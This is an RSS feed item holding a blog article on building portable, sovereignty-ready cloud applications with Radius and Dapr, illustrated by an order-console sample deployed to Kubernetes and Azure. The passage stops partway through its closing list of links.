<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>Linux and Open Source Blog articles</title>
    <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/bg-p/LinuxandOpenSourceBlog</link>
    <description>Linux and Open Source Blog articles</description>
    <pubDate>Thu, 16 Jul 2026 19:34:45 GMT</pubDate>
    <dc:creator>LinuxandOpenSourceBlog</dc:creator>
    <dc:date>2026-07-16T19:34:45Z</dc:date>
    <item>
      <title>Designing for cloud sovereignty with Radius and Dapr</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/designing-for-cloud-sovereignty-with-radius-and-dapr/ba-p/4535067</link>
      <description>&lt;P&gt;In 2026, cloud sovereignty matters more than ever. It has moved from a policy discussion to an operational and architectural problem. The word “sovereignty” gets used loosely, and it can mean different things to different people. While definitions vary, in this post we define “cloud sovereignty” as the ability for an organization to retain control over where its data and compute run, which jurisdictions govern them, who operates them, and how its applications can adapt as regulatory, commercial, or operational requirements shift.&lt;/P&gt;
&lt;P&gt;This is especially relevant for developers and platform teams building applications that need to run on hyperscaler infrastructure, such as Azure, as well as in sovereign environments. Those requirements may come from regulation, procurement policies, customer expectations, or internal risk management. In Europe, this pressure is already visible through measures such as the EU Data Act, in force since September 12, 2025, which mandates data portability and interoperability between cloud and edge data processing services. More recently, the European Commission proposed the Cloud and AI Development Act (CADA) as part of its broader European Technological Sovereignty Package. For application teams, the practical takeaway is clear: more organizations need applications that can adapt to changing deployment requirements without requiring a rewrite.&lt;/P&gt;
&lt;P&gt;Portability is therefore a real engineering concern, not a theoretical one. If requirements change, moving a workload that is deeply integrated with provider-specific APIs can mean rewriting application code, not just reconfiguring infrastructure.&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-ccp-parastyle="Normal (Web)"&gt;P&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="Normal (Web)"&gt;ortable applications for sovereign environments&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend" data-ccp-parastyle-defn="{&amp;quot;ObjectId&amp;quot;:&amp;quot;13ee1c31-cbd2-5f44-b253-744034dff167|1&amp;quot;,&amp;quot;ClassId&amp;quot;:1073872969,&amp;quot;Properties&amp;quot;:[201342446,&amp;quot;1&amp;quot;,201342447,&amp;quot;5&amp;quot;,201342448,&amp;quot;1&amp;quot;,201342449,&amp;quot;1&amp;quot;,469777841,&amp;quot;Times New Roman&amp;quot;,469777842,&amp;quot;Times New Roman&amp;quot;,469777843,&amp;quot;Times New Roman&amp;quot;,469777844,&amp;quot;Times New Roman&amp;quot;,201341986,&amp;quot;1&amp;quot;,469769226,&amp;quot;Times New Roman&amp;quot;,268442635,&amp;quot;24&amp;quot;,469775450,&amp;quot;isselectedend&amp;quot;,201340122,&amp;quot;2&amp;quot;,134233614,&amp;quot;true&amp;quot;,469778129,&amp;quot;isselectedend&amp;quot;,335572020,&amp;quot;1&amp;quot;,335559740,&amp;quot;240&amp;quot;,201341983,&amp;quot;0&amp;quot;,134233118,&amp;quot;true&amp;quot;,134233117,&amp;quot;true&amp;quot;,469778324,&amp;quot;Normal&amp;quot;]}"&gt;The goal is to&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;use&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;the right managed service for each environment while keeping application code portable across environments&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;.&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;A class="lia-external-url" href="https://www.microsoft.com/en-us/sovereignty" target="_blank" rel="noopener"&gt;Microsoft Sovereign Cloud&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;provides the platform&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;foundation for digital sovereignty across sovereign public cloud, sovereign private cloud, and national partner cloud deployment models&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Azure managed services&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;provide&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;s&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;strong platform capabilities for regulated workloads.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Open source can&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;help&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;, especially when the same technology can be used as a managed service in one environment and self-operated in another.&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;CADA also elevates an explicit "open source first" principle, reflecting how inspectable, portable components can reinforce resilience and reduce strategic dependency.&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Even with those options&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;,&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;portability is not automatic&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;-&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;a&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;pplications still need a clear architectural boundary between the capabilities they&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;require&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;and the infrastructure selected for each environment. Th&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;is&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;boundary is what lets organizations use the right services in each deployment model while keeping workloads adaptable as regulatory, commercial, or operational requirements change.&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;See the di&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;a&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;gram below:&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend" data-ccp-parastyle-defn="{&amp;quot;ObjectId&amp;quot;:&amp;quot;13ee1c31-cbd2-5f44-b253-744034dff167|1&amp;quot;,&amp;quot;ClassId&amp;quot;:1073872969,&amp;quot;Properties&amp;quot;:[201342446,&amp;quot;1&amp;quot;,201342447,&amp;quot;5&amp;quot;,201342448,&amp;quot;1&amp;quot;,201342449,&amp;quot;1&amp;quot;,469777841,&amp;quot;Times New Roman&amp;quot;,469777842,&amp;quot;Times New Roman&amp;quot;,469777843,&amp;quot;Times New Roman&amp;quot;,469777844,&amp;quot;Times New Roman&amp;quot;,201341986,&amp;quot;1&amp;quot;,469769226,&amp;quot;Times New Roman&amp;quot;,268442635,&amp;quot;24&amp;quot;,469775450,&amp;quot;isselectedend&amp;quot;,201340122,&amp;quot;2&amp;quot;,134233614,&amp;quot;true&amp;quot;,469778129,&amp;quot;isselectedend&amp;quot;,335572020,&amp;quot;1&amp;quot;,335559740,&amp;quot;240&amp;quot;,201341983,&amp;quot;0&amp;quot;,134233118,&amp;quot;true&amp;quot;,134233117,&amp;quot;true&amp;quot;,469778324,&amp;quot;Normal&amp;quot;]}"&gt;To address&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;building applications that are cleanly separated from their infrastructure&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;,&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;lets&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;look at&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Radius&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;, a&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;CNCF&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;project that provi&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;d&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;es a cloud native application model&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;that&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;addresses th&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;e&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;boundary at the deployment layer by letting teams define applications in terms of what they need, while platform teams decide how those needs are met in each environment.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;For the runtime lay&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;er,&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;lets&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;consi&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;de&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;r&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Dapr&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;,&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;also a CNCF project which&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;complements&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;Radius&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="isselectedend"&gt;&amp;nbsp;by giving application code consistent APIs for common distributed application capabilities.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="auto"&gt;Radius: portability at the deployment layer&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;SPAN data-contrast="none"&gt;Radius&amp;nbsp;provides a cloud-native application model.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;It&amp;nbsp;separates the concerns of&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;what&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;an application needs from&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;how&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;those needs are met in each environment.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="1" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/concepts/resource-types/" target="_blank" rel="noopener"&gt;Resource Types&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;define the interface that developers&amp;nbsp;use to build applications. Radius ships with built-in types and supports user-defined&amp;nbsp;Resource Types&amp;nbsp;for&amp;nbsp;an&amp;nbsp;organization's own abstractions.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="2" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/concepts/recipes/" target="_blank" rel="noopener"&gt;Recipes&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;implement a Resource Type for a given environment. A Recipe is&amp;nbsp;Infrastructure as&amp;nbsp;Code;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;a&amp;nbsp;Bicep&amp;nbsp;template&amp;nbsp;or&amp;nbsp;a&amp;nbsp;Terraform&amp;nbsp;configuration&amp;nbsp;that provisions&amp;nbsp;infrastructure and returns the connection details.&amp;nbsp;The&amp;nbsp;same Resource Type&amp;nbsp;can have different Recipes&amp;nbsp;for&amp;nbsp;different environments.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="3" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/concepts/environments/" target="_blank" rel="noopener"&gt;Environments&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;bind&amp;nbsp;a set of Recipes against the compute target and credentials for a given deployment context (local Kubernetes, AKS, AKS enabled by Azure Arc, or others).&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="4" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/concepts/applications/" target="_blank" rel="noopener"&gt;Applications&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;define&amp;nbsp;the full set of resources (containers,&amp;nbsp;Dapr&amp;nbsp;building blocks, databases) and their relationships.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;At deploy time, Radius resolves each Resource Type to the Recipe registered in the target Environment&amp;nbsp;provisions the&amp;nbsp;infrastructure, and&amp;nbsp;captures the result in an Application Graph that developers and operators can query.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="auto"&gt;Dapr: runtime portability for Radius applications&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://dapr.io/" target="_blank" rel="noopener"&gt;Dapr&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; provides building block APIs for common distributed systems concerns: state management, publish and subscribe messaging, service invocation, workflows, secrets, and more. Dapr runs as a sidecar alongside each service and exposes its APIs over HTTP or gRPC. Application code calls the Dapr API instead of the underlying technology directly, which helps keep runtime dependencies more portable across environments.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;In a Radius application,&amp;nbsp;Dapr&amp;nbsp;building blocks such as state stores, pub/sub brokers, and secret stores can be declared as application resources. Radius binds those resources to the right infrastructure for each environment,&amp;nbsp;while Dapr exposes them to the application through consistent runtime APIs.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;A concrete example: order-console&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The&amp;nbsp;&lt;/SPAN&gt;&lt;A class="lia-external-url" href="https://github.com/radius-project/lab/tree/main/002-order-console" target="_blank" rel="noopener"&gt;order-console&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;sample,&amp;nbsp;available&amp;nbsp;in the official Radius project labs&amp;nbsp;repo,&amp;nbsp;demonstrates&amp;nbsp;this&amp;nbsp;architectural&amp;nbsp;pattern&amp;nbsp;end to end. It is a three-service order-management application (a Next.js frontend, an&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;orders-api&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;, and a&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;fulfillment-worker&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;) wired through&amp;nbsp;Dapr&amp;nbsp;state management and&amp;nbsp;Dapr&amp;nbsp;pub/sub. The sample ships two Radius environments:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="1" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;A&amp;nbsp;&lt;/SPAN&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Kubernetes environment&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;that provisions PostgreSQL and Apache Kafka in-cluster.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="2" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;An&amp;nbsp;&lt;/SPAN&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Azure environment&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;that&amp;nbsp;provisions&amp;nbsp;Azure Database for PostgreSQL Flexible Server and Azure Event Hubs in Kafka mode.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The same&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;app.bicep&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;deploys against&amp;nbsp;both&amp;nbsp;environments. Container images, Dapr&amp;nbsp;component&amp;nbsp;names, and application code are identical across both. Only the Recipes change. The Recipes are written in Terraform, which Radius supports as a first-class&amp;nbsp;IaC&amp;nbsp;option alongside Bicep.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;For&amp;nbsp;a&amp;nbsp;step-by-step walkthrough, including the Bicep application model, the Resource Type definitions, the Terraform Recipes, and deployment instructions,&amp;nbsp;&lt;/SPAN&gt;&lt;A class="lia-external-url" href="https://github.com/radius-project/lab/tree/main/002-order-console" target="_blank" rel="noopener"&gt;see&amp;nbsp;the order-console walkthrough&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="auto"&gt;Don’t&amp;nbsp;let the app become the lock-in&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;What Radius and Dapr contribute is the application architecture layer: a way to ensure the application itself does not become the reason a workload cannot move to a more sovereign environment when requirements change. Radius Resource Types and Recipes allow platform teams to define governance requirements such as data residency, encryption standards, and audit integration as part of the platform definition. This helps ensure that workloads are deployed consistently and in line with organizational policies, regardless of the target environment. Because these requirements are abstracted from the underlying infrastructure, the same application can be deployed across public cloud, on-premises, and sovereign environments without requiring changes to the application itself.&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Where a workload runs, and under which controls,&amp;nbsp;becomes&amp;nbsp;a deployment decision rather than a redevelopment project.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="auto"&gt;Learn more&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;To&amp;nbsp;learn&amp;nbsp;more about Radius and&amp;nbsp;Dapr,&amp;nbsp;explore&amp;nbsp;the resources&amp;nbsp;below:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="18" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="1" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/" target="_blank" rel="noopener"&gt;Radius documentation&lt;/A&gt;&lt;SPAN 